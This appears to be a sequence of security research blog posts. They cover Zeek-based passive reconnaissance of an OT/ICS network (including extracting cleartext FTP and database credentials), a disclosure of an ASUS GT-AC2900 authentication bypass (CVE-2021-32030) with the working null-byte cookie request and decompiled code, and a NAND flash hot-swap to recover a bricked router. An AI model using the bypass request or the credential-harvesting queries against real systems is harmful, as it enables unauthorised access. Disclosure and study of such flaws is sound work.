conn.log Hosts, ports, bytes transferred, transport layer protocols, etc.
dns.log Queries, query types, answers
http.log Hostnames, URIs, HTTP verbs, etc.
files.log File types, filenames, hashes, etc.
ftp.log Users, commands, paths, etc.
ssl.log SSL/TLS versions, ciphers, hostnames, server ports, etc.
x509.log Cert versions, cert subjects, cert, issuers, dates, etc.
smtp.log Senders, recipients, subjects, message bodies, routes/paths, etc.
ssh.log Client/server versions, algorithms, pubkey fingerprints, etc.
pe.log Architectures, OSes, PE sections, debug info
dhcp.log Message types, assigned addresses, MAC addresses, hostnames, etc.
ntp.log Times, versions, strata, offsets, clients/servers, etc.
SMB Logs (plus DCE-RPC, Kerberos, NTLM) SMB share mappings, DCE-RPC call info, Kerberos KDC interactions, etc.
irc.log Commands, nicks/users, etc.
rdp.log Hosts, security protocols, cookies, etc.
traceroute.log Source/dest, protocols, ports
tunnel.log (Typically Teredo) tunnel types, actions, hosts, etc.
dpd.log Used for reporting problems with Dynamic Protocol Detection
known_*.log and software.log Which ports/hosts and software (versions) were observed
weird.log and notice.log Issues where protocols deviated from norm
capture_loss.log and reporter.log Diagnostic

Of course, there are other logs specific to other protocols, such as modbus.log, dnp3.log, mqtt.log, etc.

Log Correlation

Log entries are also assigned IDs (uid) for correlation across different log types. For example, a connection (in conn.log) might correspond to an HTTP request (http.log). That HTTP request may have downloaded a file (files.log), which was a Portable Executable (PE) (whose analysis shows up in pe.log). This is seen in the following example. First, we'll start with conn.log:

    "ts": 1616187600.203065,
    "uid": "C3R4Ar79TjjOQZDk1",
    "id.orig_h": "",
    "id.orig_p": 50395,
    "id.resp_h": "",
    "id.resp_p": 80,
    "proto": "tcp",
    "service": "http",
    "duration": 17.525580167770386,
    "orig_bytes": 339,
    "resp_bytes": 2778935,
    "conn_state": "RSTO",
    "local_orig": true,
    "local_resp": false,
    "missed_bytes": 2525951,
    "history": "ShADadcgcgcgR",
    "orig_pkts": 102,
    "orig_ip_bytes": 4431,
    "resp_pkts": 179,
    "resp_ip_bytes": 260156,
    "orig_l2_addr": "34:41:5d:9f:0d:8f",
    "resp_l2_addr": "02:42:c0:a8:00:02"

Connection entry in conn.log

Note the uid value of C3R4Ar79TjjOQZDk1, which is seen in the following HTTP request in http.log:

    "ts": 1616187600.226666,
    "uid": "C3R4Ar79TjjOQZDk1",
    "id.orig_h": "",
    "id.orig_p": 50395,
    "id.resp_h": "",
    "id.resp_p": 80,
    "trans_depth": 1,
    "method": "GET",
    "host": "edgedl.gvt1.com",
    "uri": "/chrome_updater.exe",
    "version": "1.1",
    "user_agent": "Google Update/;winhttp",
    "request_body_len": 0,
    "response_body_len": 2778496,
    "status_code": 200,
    "status_msg": "OK",
    "tags": [],
    "resp_fuids": [
    "resp_mime_types": [

HTTP request in http.log

In the above log entry, we see a few additional fields, such as the uri, method, host, etc. -- all items specific to HTTP. Additionally, the value in resp_fuids (FnFzCVkm11eShPHLb) corresponds to a unique ID for the file associated with this request. This value is observed in the fuid field of the files.log entry shown below:

    "ts": 1616187600.257684,
    "fuid": "FnFzCVkm11eShPHLb",
    "tx_hosts": [
    "rx_hosts": [
    "conn_uids": [
    "source": "HTTP",
    "depth": 0,
    "analyzers": [
    "mime_type": "application/x-dosexec",
    "duration": 0.34926891326904297,
    "local_orig": false,
    "is_orig": false,
    "seen_bytes": 252545,
    "total_bytes": 2778496,
    "missing_bytes": 2525951,
    "overflow_bytes": 0,
    "timedout": false

Finally, as this was a PE, it was examined by Zeek's PE analyzer. In the following pe.log entry, we see FnFzCVkm11eShPHLb in the id field, along with additional information about the binary:

    "ts": 1616187600.273825,
    "id": "FnFzCVkm11eShPHLb",
    "machine": "AMD64",
    "compile_ts": 1615499290,
    "os": "Windows XP x64 or Server 2003",
    "subsystem": "WINDOWS_GUI",
    "is_exe": true,
    "is_64bit": true,
    "uses_aslr": true,
    "uses_dep": true,
    "uses_code_integrity": false,
    "uses_seh": true,
    "has_import_table": true,
    "has_export_table": false,
    "has_cert_table": true,
    "has_debug_data": true,
    "section_names": [

With some of these high-level basics out of the way, I'll now go into some more specific examples.

The Scenario

On a recent attack simulation project, our team was dropped onto a customer's highly critical OT/ICS network, with the directive of being extremely diligent to avoid any sort of disruption of controllers, supervisory systems, management systems, etc. Rules around scanning, discovery, and enumeration activities were very prohibitive. However, we were provided access to a monitoring/SPAN port which mirrored traffic from certain network segments. This was a perfect source of data to analyze with Zeek, and helped further guide our active testing efforts while respecting the customer's constraints.

For the following examples, we'll be using jq to parse Zeek's various logs in a syntax like jq [query] [log file].

Extracting DNS queries from dns.log

Perhaps the simplest -- and maybe most obvious -- example is using Zeek's dns.log to gather information on DNS queries.

$ jq '. | {client: ."id.orig_h", server: ."id.resp_h", query: .query, type: .qtype_name, answers: .answers}' dns.log
  "client": "",
  "server": "",
  "query": "dci.sophosupd.net",
  "type": "A",
  "answers": [
  "client": "",
  "server": "",
  "query": "ping3.teamviewer.com",
  "type": "A",
  "answers": [
  "client": "",
  "server": "",
  "query": "FILESERVER02",
  "type": "NB",
  "answers": null

Finding listening services (or "scanning without scanning")

In lieu of sending traffic to the target network(s), we let Zeek do the heavy lifting in analyzing which hosts are likely listening on which ports, and which application-layer protocols are observed on those ports.


$ jq '{host: .host, port: .port_num, proto: .port_proto, service: .service}' known_services.log

Example Output

  "host": "",
  "port": 5900,
  "proto": "tcp",
  "service": [
  "host": "",
  "port": 502,
  "proto": "tcp",
  "service": [
  "host": "",
  "port": 53,
  "proto": "udp",
  "service": [
  "host": "",
  "port": 135,
  "proto": "tcp",
  "service": [

Hosts with access to other subnets

In this example, we query the connection log (conn.log) to see which hosts are talking across subnets. This is useful when trying to identify possible pivots.


$ jq '. | select((."id.resp_h" | startswith("192.168.11")) or (."id.orig_h" | startswith("192.168.11"))) | {src: ."id.orig_h", dst: ."id.resp_h"}' conn.log

Example Output

  "src": "",
  "dst": ""
  "src": "",
  "dst": ""
  "src": "",
  "dst": ""

Hosts with access to other subnets and respective destination ports

We can take the above example a step further and also query for the ports associated with the conversation(s) to get even more insight about the relationships between hosts/devices.


$ jq '. | select((."id.resp_h" | startswith("192.168.11")) or (."id.orig_h" | startswith("192.168.11"))) | {src: ."id.orig_h", srcport: ."id.orig_p", dst: ."id.resp_h", dstport: ."id.resp_p"}' conn.log

Example Output

  "src": "",
  "srcport": 52433,
  "dst": "",
  "dstport": 88
  "src": "",
  "srcport": 61067,
  "dst": "",
  "dstport": 80
  "src": "",
  "srcport": 52432,
  "dst": "",
  "dstport": 445

Cleartext FTP passwords

Note: password logging needs to be enabled first by adding the following line to local.zeek:

"redef FTP::default_capture_password = T;"

In this example, we query ftp.log for very simple values: usernames and passwords.


$ jq '. | {server: ."id.resp_h", port: ."id.resp_p", username: .user, password: .password}' ftp.log

Example Output

  "host": "",
  "port": 21,
  "username": "upload",
  "password": "upload123"

Session IDs in URLs

Zeek's HTTP analyzer will extract elements from HTTP requests, including the method, URI, User-Agent, etc. In the following example, we query for any uri field with the string sessionID (with a case insensitive match).


$ jq '. | select(.uri | match("sessionID", "i")) | {host: ."id.resp_h", port: ."id.resp_p", uri: .uri}' http.log

Example Output

  "host": "",
  "port": 8080,
  "uri": "/login.jsp;JSESSIONID=D7E73C21F471E6488CE00B50FD0E5186?client=client"

Software/version inventory

Zeek's software.log can be used to identify which applications/services and their respective versions (where available) are observed, including both clients and servers, as shown in the following example.


$ jq '. | {host: .host, port: .host_p, software: .unparsed_version}' software.log

Example Output

  "host": "",
  "port": 80,
  "software": "GoAhead-Webs"
  "host": "",
  "port": 8080,
  "software": "Apache-Coyote/1.1"
  "host": "",
  "port": null,
  "software": "PH.Framework.Communication.SshNet.SshClient.0.0.1"

VNC Port and Desktop/Display Name

The VNC (or, rather, "RFB") analyzer can pull additional information about VNC servers and display names. In the following example, we query the rfb.log to identify which VNC servers were observed.


$ jq '. | {host: ."id.resp_h", port: ."id.resp_p", title: .desktop_name}' rfb.log

Example Output

  "host": "",
  "port": 5900,
  "title": "PanelView VNC Server"
  "host": "",
  "port": 5900,
  "title": "admin-pc ( ) - service mode"

Correlating from an HTTP request to an extracted file

Here we have a longer, albeit distilled example to demonstrate correlating an HTTP request down to an extracted file. In this case, we wanted to identify XML files containing configuration data, such as credentials. First we'll look in http.log for any (plaintext) HTTP requests that fetched an XML file.

Filtering for specific MIME types in http.log


jq '. | select(.resp_mime_types[] | match("xml")) | {host: .host, uri: .uri, fuids: .resp_fuids, mime_type: .resp_mime_types}' http.log

Example Output

  "host": "",
  "uri": "/config.xml",
  "fuids": [
  "mime_type": [

As an identifier for a file (fuid) was returned, we know there was a file associated with this. So, we then want to identify the name of the extracted file by querying files.log.

Filtering for extracted files in files.log


$ jq '. | select(.fuid=="F7Hil53SZhP7kZbkm4") | .extracted' files.log

Example output



Finally, we can simply cat the extracted file on disk.

$ cat /opt/zeek/logs/current/extract_files/extract-1619800042.170101-HTTP-F7Hil53SZhP7kZbkm4

Example XML file with credentials

<?xml version="1.0" encoding="UTF-8"?>
<add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" />


This post probably does very little justice to just how powerful Zeek truly is, and barely scratches the surface of its usefulness for both defense and offense. Shuttling Zeek logs into something like Elasticsearch can provide tremendous awareness about network activity, but that's not always possible (or reasonable) in an offensive operation. Combined with a tool like jq -- and a source of network traffic, of course -- Zeek's capabilities can be quickly and easily leveraged to gain more insight into the target network and hosts/devices.

For anyone interested in doing more with Zeek from either angle, here are a few recommended resources:

CVE-2021-32030: ASUS GT-AC2900 Authentication Bypass

In a previous blog post I had presented a creative method to resurrect a bricked device, in this post I will go over a vulnerability discovered within the running firmware.

(Atredis has also published an advisory on the vulnerability discussed in this post.)

How it started

When assessing a device, one of the first steps is to gain access to a copy of the software running on the device to assist in the process of understanding how it works. Firmware can be retrieved for a target either by downloading it from the manufacturer or extracting it from the target. In this case, the device manufacturer (ASUS) provides firmware updates. The firmware running on the target at the time of testing can be accessed at the following location:


The decompressed CFE image can be easily extracted using the excellent binwalk tool (ensure that ubi_reader and jefferson dependencies are installed first):

binwalk -e GT-AC2900_3.0.0.4_384_82072-gc842320_cferom_ubi.w

144300        0x233AC         SHA256 hash constants, little endian
144572        0x234BC         CRC32 polynomial table, little endian
276396        0x437AC         SHA256 hash constants, little endian
276668        0x438BC         CRC32 polynomial table, little endian
408492        0x63BAC         SHA256 hash constants, little endian
408764        0x63CBC         CRC32 polynomial table, little endian
540588        0x83FAC         SHA256 hash constants, little endian
540860        0x840BC         CRC32 polynomial table, little endian
672684        0xA43AC         SHA256 hash constants, little endian
672956        0xA44BC         CRC32 polynomial table, little endian
804780        0xC47AC         SHA256 hash constants, little endian
805052        0xC48BC         CRC32 polynomial table, little endian
1048576       0x100000        JFFS2 filesystem, little endian
4456448       0x440000        UBI erase count header, version: 1, EC: 0x0, VID header offset: 0x800, data offset: 0x1000

ls -alh _GT-AC2900_3.0.0.4_384_82072-gc842320_cferom_ubi.w.extracted/
total 130M
drwxrwxr-x 4 chris chris 4.0K Jan 21 20:11 .
drwxrwxr-x 3 chris chris 4.0K Jan 21 20:10 ..
-rw-rw-r-- 1 chris chris  67M Jan 21 20:10 100000.jffs2
-rw-rw-r-- 1 chris chris  64M Jan 21 20:11 440000.ubi
drwxrwxr-x 3 chris chris 4.0K Jan 21 20:11 jffs2-root
drwxrwxr-x 3 chris chris 4.0K Jan 21 20:11 ubifs-root

Normally this would be the point where you would start digging for bugs; however, ASUS provides a nice GPL archive for their devices:


The archive contains just about everything you would need to build a working firmware image. The main caveat is that ASUS ships the interesting parts as prebuilt objects instead of the actual source. With that small detour out of the way, we can get back to the bug.

How it’s going

The ASUS GT-AC2900 device's administrative web application utilizes a session cookie (asus_token) to manage session states. While auditing the session handling functionality, I found that the validation of this cookie fails when the following occurs:

  • The submitted asus_token starts with a Null (0x0)

  • The request User-Agent matches an internal service UA (asusrouter--)

  • The device has not been configured with an ifttt_token (default state)

This condition results in the server incorrectly identifying the request as being authenticated. The following example shows a normal request and response for valid session:

GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Content-Length: 0
User-Agent: asusrouter--
Connection: close
Cookie: asus_token=iCOPsFa54IUYc4alEFeOP4vjZrgspAY; clickedItem_tab=0

HTTP/1.0 200 OK
Server: httpd/2.0
Content-Type: application/json;charset=UTF-8
Connection: close


The following shows that the same request fails in the case an invalid asus_token is provided:

GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Content-Length: 0
User-Agent: asusrouter-- 
Connection: close
Cookie: asus_token=Invalid; clickedItem_tab=0

HTTP/1.0 200 OK
Server: httpd/2.0
Content-Type: application/json;charset=UTF-8
Connection: close


If a Null character is placed at the front of the asus_token, the request will be incorrectly identified as being authenticated, as seen in the following request and response:

GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Content-Length: 0
User-Agent: asusrouter--
Connection: close
Cookie: asus_token=\0Invalid; clickedItem_tab=0

HTTP/1.0 200 OK
Server: httpd/2.0
Content-Type: application/json;charset=UTF-8
Connection: close


How it’s actually going

Authentication and validation of requests occurs within the function handle_request, specifically through the function auth_check, which can be seen in the following code excerpt from the GPL source archive:

router/httpd/httpd.c - handle_request

static void
handler->auth(auth_userid, auth_passwd, auth_realm);
auth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp); // <---- call to auth_check in web_hook.o
if (auth_result != 0) 
	if(strcasecmp(method, "post") == 0 && handler->input)	//response post request
		while (cl--) (void)fgetc(conn_fp);
        send_login_page(fromapp, auth_result, url, file, auth_check_dt, add_try);

The auth_check function is implemented within a compiled object (web_hook.o) which validates the received session identifier is valid. The process is broken down to the following items at a high level:

  • Check that the request cookies contain an asus_token

  • Check if the extracted asus_token exists within the current session list

  • Check if the extracted asus_token is a stored service token (IFTTT/Alexa)

The following decompiled pseudocode shows the underlying code responsible for carrying out this process:

router/httpd/prebuild/web_hook.o - auth_check

int __fastcall auth_check(char *dirname, char *authorization, const char *url, char *file, char *cookies, int fromapp_flag)
  void *v7; // r0
  bool v8; // cc
  char *v9; // r5
  int *v10; // r0
  int v11; // r5
  int *v12; // r4
  int v13; // r0
  int v14; // r0
  bool v15; // cc
  char *v16; // r5
  int *v17; // r0
  int result; // r0
  char *pAsusTokenKeyStart; // r0
  char *pAsusTokenValueStart; // r9
  size_t space_count; // r0
  unsigned int v22; // r2
  int *v23; // r0
  int v24; // r5
  int *v25; // r4
  int v26; // [sp+10h] [bp-50h]
  char user_token[32]; // [sp+1Ch] [bp-44h] BYREF

  v7 = memset(user_token, 0, sizeof(user_token));
  v26 = cur_login_ip_type;
  result = auth_passwd;
  if ( auth_passwd )
    // check that the request has a cookie header set and the asus_token cookie exists
    // example header - Cookie: asus_token=iCOPsFa54IUYc4alEFeOP4vjZrgspAY; clickedItem_tab=0
    if ( !cookies || (pAsusTokenKeyStart = strstr(cookies, "asus_token")) == 0 ) // <-----
      // check if this is the first access for initial setup - this is skipped
      if ( !is_firsttime() ) // <-----
        add_try = 0;
        return 1;
      goto PAGE_REDIRECT;
    // find the location of the asus_token value
    pAsusTokenValueStart = pAsusTokenKeyStart + 11; // <-----
    space_count = strspn(pAsusTokenKeyStart + 11, " \t"); // <-----
    // set the user_token variable to the extracted value from the user request
    snprintf(user_token, 0x20u, "%s", &pAsusTokenValueStart[space_count]); // <-----
    // validate the user_token value, check_ifttt_token returns 1, causing the if statement to be skipped that would normally result in an authentication failure
    if ( !search_token_in_list(user_token, 0) && !check_ifttt_token(user_token) ) // <-----

The check_ifttt_token function compares the user submitted value to the stored configuration value currently stored in the systems NVRAM configuration. The following shows the decompiled pseudocode for this function:

router/httpd/prebuild/web_hook.o - check_ifttt_token

int __fastcall check_ifttt_token(const char *asus_token)
  char *ifft_token; // r0
  char *v3; // r0
  int result; // r0
  ifft_token = nvram_safe_get("ifttt_token"); // <----- returns \0

The function nvram_safe_get is used to retrieve the stored iftt_token value from the systems NVRAM configuration, which can be seen in the following decompiled pseudocode:

router/httpd/prebuild/web_hook.o - nvram_safe_get
char *__fastcall nvram_safe_get(char* setting_key)
  char *result; // r0

  result = nvram_get(setting_key);
  if ( !result )
    result = "\0";
  return result;

In the case the NVRAM configuration does not contain a value for the requested setting, the function returns "\0" (Null). As the submitted asus_token has been set to a Null from the original request the string comparison will indicate that the values are equal and the check_iftt_token function will return true (1), as seen in the following pseudocode:

router/httpd/prebuild/web_hook.o - check_ifttt_token

ifft_token = nvram_safe_get("ifttt_token"); // <----- returns \0
  if ( !strcmp(asus_token, ifft_token) ) // <----- returns 0 as they match, evals to true and login is successful
    // if the IFTTT_ALEXA log file is enabled, log successful check message
    if ( isFileExist("/tmp/IFTTT_ALEXA") > 0 )
      Debug2File("/tmp/IFTTT_ALEXA.log", "[%s:(%d)][HTTPD] IFTTT/ALEXA long token success.\n", "check_ifttt_token", 760);
      // Return 1
      result = 1; // <----- set result value
  else// <----- skipped
    if ( isFileExist("/tmp/IFTTT_ALEXA") > 0 )
      Debug2File("/tmp/IFTTT_ALEXA.log", "[%s:(%d)][HTTPD] IFTTT/ALEXA long token fail.\n", "check_ifttt_token", 766);
    if ( isFileExist("/tmp/IFTTT_ALEXA") > 0 )
        "[%s:(%d)][HTTPD] IFTTT/ALEXA long token is %s.\n",
    if ( isFileExist("/tmp/IFTTT_ALEXA") > 0 )
      v3 = nvram_safe_get("ifttt_token");
      Debug2File("/tmp/IFTTT_ALEXA.log", "[%s:(%d)][HTTPD] httpd long token is %s.\n", "check_ifttt_token", 768, v3);
    result = 0;
  return result; // <----- return 1

Continuing back within auth_check, the check_ifttt_token return value causes the if statement to evaluate to false, skipping the code path that would result in a failed authentication attempt, resulting in the authentication process to succeed:

router/httpd/prebuild/web_hook.o - auth_check

  if ( !search_token_in_list(user_token, 0) && !check_ifttt_token(user_token) ) // <-----
      if ( !is_firsttime() )
        if ( !strcmp(last_fail_token, user_token) )
          add_try = 0;
          strlcpy(last_fail_token, user_token, 32);
          add_try = 1;
        v23 = _errno_location();
        v24 = *v23;
        v25 = v23;
        if ( f_exists("/tmp/HTTPD_DEBUG") > 0 || nvram_get_int("HTTPD_DBG") > 0 )
          asusdebuglog(6, "/jffs/HTTPD_DEBUG.log", 0, 1, 0, "[%s(%d)]:AUTHFAIL\n\n", "auth_check", 1054);
        result = 2;
        *v25 = v24;
        return result;
      page_default_redirect(fromapp_flag, url);
      return 0;
  return result;

By monitoring the system logs confirmation of successful IFTTT/ALEXA login token processing can be seen when submitting a malformed asus_token:

admin@GT-AC2900-3711:/jffs# tail -f /tmp/IFTTT_ALEXA.log
[check_ifttt_token:(1014)][HTTPD] IFTTT/ALEXA long token success.

How it ends

ASUS released an updated firmware image that addresses this vulnerability that can be downloaded from their support site.

NANDcromancy: Live Swapping NAND Flash

26 April 2021 at 18:39

Often when assessing an embedded system, changes can occur (intended or otherwise) that cause the target system to enter a state where it no longer works ('bricked'). In some cases fixing the target is as simple as performing a "factory reset", others may be slightly more involved and require flashing the target using a debug interface (JTAG/SWD/*) or manually flashing an external storage device (SPI/NOR/Nand/eMMC). This post walks through resolving a situation where a target has been 'bricked' with a creative methodology.

During some downtime, I was poking at an off the shelf consumer router that was using Common Firmware Environment (CFE) as a boot loader. While interacting with the CFE trying to identify arguments that are passed to the target's operating system at boot, the system configuration was accidentally corrupted:

CFE> b
Press:  <enter> to use current value
        '-' to go previous parameter
        '.' to clear the current value
        'x' to exit this command
94908AC5300R               ------ 03
94906REF                   ------ 07
GT-AC2900                  ------ 08
Board Id                          :  8  X     <---- whoops
Number of MAC Addresses (1-64)    :  10  ^C   <---- more whoops
Memory Configuration Changed -- REBOOT NEEDED <---- whoops saved. 
flow memory allocation (MB)       :  14  ----

At this point I figured a final save/write would be required to commit the accidental changes, so I opted to just power cycle the device to avoid making permanent changes. After power cycling the device, an error occurred:

Shmoo WR DM
00 ------++++++++++++++++++++++++++X+++++++++++++++++++++++++++----------
01 --+++++++++++++++++++++++++X++++++++++++++++++++++++++----------------
02 X---------------------------------------------------------------------
03 X---------------------------------------------------------------------
MEMSYS init failed, return code 00000001
MEMC error:  0x00000000
PHY error:  0x00000000
SHMOO error:  0x10c00000 

When the device came back up, it immediately produced the previous error and failed to enter the CFE. Without being able to access the boot loader, the configuration could not be changed and the boot loader's recovery process could not be utilized either. Searching online for this error was not helpful and resulted in dead ends and the general consensus is if you corrupt CFE in this manner - the device is 'bricked'. At this point I switched to working with my backup device (always have a backup) so I could answer my original question regarding interesting target arguments. As an aside, the setting kernp mfg_nvram_mode=1 mfg_nvram_url=BADURL is particularly interesting.

Later on I circled back to the bricked unit to identify a path to fix it. The target is using a Broadcom SoC and an unpopulated header was found to provide JTAG access:

After enumerating the JTAG pinout on the unpopulated header with a JTagulator, it was possible to confirm access using OpenOCD:

$ openocd -f ../interface/jlink.cfg -f bcm49.cfg
Open On-Chip Debugger 0.11.0-rc2+dev-gba0f382-dirty (2021-02-26-14:07)
Licensed under GNU GPL v2
For bug reports, read
DEPRECATED! use 'adapter speed' not 'adapter_khz'
Info : Listening on port 6666 for tcl connections
Info : Listening on port 4444 for telnet connections
Info : J-Link V10 compiled Dec 11 2020 15:39:30
Info : Hardware version: 10.10
Info : VTarget = 3.323 V
Info : clock speed 1000 kHz
Info : JTAG tap: bcm490x.tap tap/device found: 0x5ba00477 (mfg: 0x23b (ARM Ltd), part: 0xba00, ver: 0x5)
Info : JTAG tap: auto0.tap tap/device found: 0x4ba00477 (mfg: 0x23b (ARM Ltd), part: 0xba00, ver: 0x4)
Info : JTAG tap: auto1.tap tap/device found: 0x0490617f (mfg: 0x0bf (Broadcom), part: 0x4906, ver: 0x0)
Info : JTAG tap: auto2.tap tap/device found: 0x0490617f (mfg: 0x0bf (Broadcom), part: 0x4906, ver: 0x0)
Info : bcm490x.a53.0: hardware has 6 breakpoints, 4 watchpoints

The other path for restoring the system is through the storage device, a Macronix NAND chip:

At this point I started to wonder about something, I still had a working device that I could boot into the boot loader - would it be possible to swap the NAND chip on a running device and use it to flash the corrupted NAND?

Before attempting anything, I asked a co-worker if he thought this stupid idea would have any chance at working, he wasn't optimistic on the outcome (to be fair, I wasn't either) - we made a bet on the results and I went to work.

The first stage of testing was to find out if the system would tolerate having the NAND 'removed' while running? I knew that answering this question I would need to be more methodical than just hitting the unit with hot air while its running and removing the chip. The first stage of this process was to identify how the NAND is being powered. The layout looks like VCC is tied into the chip in the following locations:

With the VCC lines identified, the easiest way to answer our first question would be to remove the VCC lines from the NAND while the system is running. In order to do this, my first try was to cut the VCC lines and add 'jumper' wires (36 AWG Magnet Wire is great stuff) that can be disconnected once the boot loader is done:

On the right hand side I chose to cut further back on the power trace thinking it would be a better spot as it feeds into a few pins on the NAND. On the first jumper install I used a fiberglass scratch pen to remove the coating and expose the copper and a small knife to cut the trace:

The result was gross as the scratch pen tip was far too big and I ended up exposing lots of copper. Don't use a scratch pen, just a fine tipped knife so you don't end up with a mess. More like this:

With the 'jumpers' installed and connected, the target was powered up to the boot loader (CFE) and the command dn (dump nand) was used to ensure the NAND was accessible, power was then removed by disconnecting the jumper wires:

CFE> dn
------------------ block: 0, page: 0 ------------------
00000000: 00000000 00000000 00000000 00000000    ................
00000010: 00000000 00000000 00000000 00000000    ................
00000020: 00000000 00000000 00000000 00000000    ................

----------- spare area for block 0, page 0 -----------
00000800: ff851903 20000008 00fff645 c2b9bf55    .... ......E...U
00000810: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000820: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000830: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.

*** command status = 1
web info: Waiting for connection on socket 1.␛[J
web info: Waiting for connection on socket 0.␛[J
CFE> ␀----       <----- VCC Removed (reboot)

When the power was removed (marked with 'VCC Removed') the target rebooted and failed to return to the boot loader as the NAND was not accessible. The source of the problem was the right side power cut was in a spot that removed power from the SoC as well as the NAND. Keeping it simple, the initial cut was restored and only the trace closest to the NAND was cut and jumpered:

Bringing the system back up and attempting the previous test gave me the answer to my initial question: when the power is removed by disconnecting the jumper wires, the system remains operational, as confirmed by running the dn command:

<----- NAND VCC Removed 
CFE> dn
------------------ block: 0, page: 2 ------------------
Status wait timeout: nandsts=0x30000000 mask=0x80000000, count=2000000
Error reading block 0
00001000: 00000000 00000000 00000000 00000000    ................
Status wait timeout: nandsts=0x30000000 mask=0x80000000, count=2000000
----------- spare area for block 0, page 2 -----------
00000800: 00000000 00000000 00000000 00000000    ................
00000810: 00000000 00000000 00000000 00000000    ................
00000820: 00000000 00000000 00000000 00000000    ................
00000830: 00000000 00000000 00000000 00000000    ................
Error reading block 0 
*** command status = -1      <----- Expected error reading NAND 
<----- NAND VCC Enabled 
CFE> dn
------------------ block: 0, page: 3 ------------------
00001800: 00000000 00000000 00000000 00000000    ................
00001810: 00000000 00000000 00000000 00000000    ................
----------- spare area for block 0, page 3 -----------
00000800: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000810: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000820: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000830: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
*** command status = 1      <----- Successful NAND read

By confirming it is possible to 'turn off' the NAND on the running system without disrupting the boot loader, the next step was to try to power down the NAND and physically remove it from the board while it's running.

Using hot air and tweezers, one side was lifted at a time (right side then left):

This process resulted in the system restarting and failing to enter the boot loader:

CFE> ␀----    <----- NAND Removed (reboot)
␀----         <----- FAIL boot loop

Since I had lifted the NAND off one side at a time while monitoring the console it was easy to see that the reboot occurred when lifting the "left" side of the NAND:

The most likely culprits were the Read Enable (RE#) or Ready/Busy (R/B#) pins changing state. To test this, jumper wires were added to both:

At this point the NAND had to be placed back on the board in order to return the system back to the boot loader, the NAND was once again powered down by disconnecting the VCC jumpers and the RE#,R/B# lines were held low by attaching them to ground:

The NAND was again removed, working one side at a time while monitoring the boot loader console:

This time the boot loader remained active and the system did not reboot. With one more part of the puzzle completed it was time to move on to the next step - attaching the corrupted NAND to the running target.

Once again hot air was used to solder the replacement NAND to the target, the first attempt was unsuccessful as some pins were shorted when trying to get the alignment right on both sides. As encountered previously, failure at this point requires starting the entire process over again - the replacement NAND had to be removed and the original had to be placed back on the board.

For the second attempt, a small piece of paper was used to insulate one side of the NAND while the other was aligned and attached with hot air:

Once the first side was attached, the paper was removed and the other side was attached. The boot loader remained active once the new NAND was in place. The next step was to re-enable the RE#,R/B# pins by removing the ground jumper wires and finally VCC jumper was reattached. Once everything was reconnected, confirmation that the NAND was available was done again with the dn command:

CFE> dn
------------------ block: 0, page: 0 ------------------
00000000: 00000000 00000000 00000000 00000000    ................
00000010: 00000000 00000000 00000000 00000000    ................
00000020: 00000000 00000000 00000000 00000000    ................
----------- spare area for block 0, page 0 -----------
00000800: ff851903 20080000 00c2b822 c978ff97    .... ......".x..
00000810: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000820: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000830: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.

*** command status = 1   <----- Success!

With a successful test read completed, the factory firmware image was loaded through the boot loader's web interface:

web info: Waiting for connection on socket 1.␛[J
web info: Upload 70647828 bytes, flash image format.␛[J   <----- Image Upload
CFE> ........

Setting JFFS2 sequence number to 13

Flashing root file system at address 0x06000000 (flash offset 0x06000000): <-----Image Write
.................................................................... .....................................................................
Resetting board in 0 seconds...�----
CFE version 1.0.38-161.122 for BCM94908 (64bit,SP,LE)
Build Date: Mon May 13 08:23:21 CST 2019 (defjovi@ubuntu-eva02)
Copyright (C) 2000-2015 Broadcom Corporation.

Boot Strap Register:  0x6fc42
Chip ID: BCM4906_A0, Broadcom B53 Quad Core: 1800MHz
Total Memory: 536870912 bytes (512MB)
Status wait timeout: nandsts=0x50000000 mask=0x40000000, count=0
NAND ECC BCH-4, page size 0x800 bytes, spare size used 64 bytes
NAND flash device: , id 0xc2da block 128KB size 262144KB
Initalizing switch low level hardware.
pmc_switch_power_up: Rgmii Tx clock zone1 enable 1 zone2 enable 1.
Software Resetting Switch ... Done.
Waiting MAC port Rx/Tx to be enabled by hardware ...Done
Disable Switch All MAC port Rx/Tx
*** Press any key to stop auto run (1 seconds) ***
Auto run second count down: 0
Booting from only image (address 0x06000000, flash offset 0x06000000) ...  <----- Success!!111!
Decompression LZMA Image OK!
Entry at 0x0000000000080000
Starting program at 0x0000000000080000
/memory = 0x20000000
Booting Linux on physical CPU 0x0
Linux version 4.1.27 (jenkins@asuswrt-build-server) (gcc version 5.3.0 (Buildroot 2016.02) ) #2 SMP PREEMPT Fri Jun 19 13:05:44 CST 2020
CPU: AArch64 Processor [420f1000] revision 0
Detected VIPT I-cache on CPU0

As shown in the output, the flash was successful and the system booted into the target operating system.

I am sure some reading this will say - "why not use $device_name_here chip reader/writer to reprogram the NAND?", which is an absolutely fair question and probably makes more sense than this nonsense; However, I believe the fitting quote to reference here is one by the famous chaos theory mathematician:

'Your scientists were so preoccupied with whether they could, they didn't stop to think if they should'

- Dr. Jeffrey Goldblum

QEMU and U: Whole-system tracing with QEMU customization

15 April 2021 at 18:06


QEMU is a key tool for anyone searching for bugs in diverse places. Besides just opening the doors to expensive or opaque platforms, QEMU has several internal tools available to enable developer’s further insight and control. Researchers comfortable modifying QEMU have access to powerful inspection capabilities. We will walk through a recent custom addition to QEMU to highlight some helpful internal tools and demonstrate the power of a hackable emulator.

